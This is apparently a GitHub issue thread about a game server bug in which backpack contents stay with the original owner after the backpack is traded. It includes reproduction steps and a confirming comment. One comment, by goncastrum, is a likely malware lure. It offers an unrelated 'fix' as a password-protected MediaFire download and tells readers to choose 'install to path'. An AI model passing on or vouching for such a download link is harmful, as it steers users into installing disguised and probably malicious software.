### ISSUE TITLE
Backpack contents are not transferred in trade

### ISSUE THREAD

**Issue by prkdrake** [project-rubika/issues#833]
**Describe the bug**
When a backpack is traded between players, the contents of the backpack should also be traded to the other party. 

At the moment, the contents of the backpack remain with the player who placed the items into the backpack originally.

**To Reproduce**
1. Acquire a backpack (`.item 99228 99228 1`)
2. Put something inside the backpack. (`.item 27383 27383 1`)
3. Trade the backpack to another player.
4. Open the backpack on the other player. Notice the item is not present.
5. Trade the backpack back to the original player.
6. Open the backpack. Notice that the item is present.

**Expected behavior**
The other player should be able to access the contents of the traded backpack, and the original owner of the backpack should not be able to.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by RaggyLP** [comment]
![image](https://github.com/user-attachments/assets/59d1c4bc-a090-4f12-8e95-cbf1db519052)
![image](https://github.com/user-attachments/assets/52b1f5ff-a0a6-4146-8913-25607181cdc3)

Verified. Logging out and back in with the traded backpack doesn't update the backpack's inventory. I did notice that opening the backpack on the traded-to player, meant the window closed in about 1-2s. Anti-tamper, perhaps?

When the backpack is returned to the true owner however, the stored items are present.
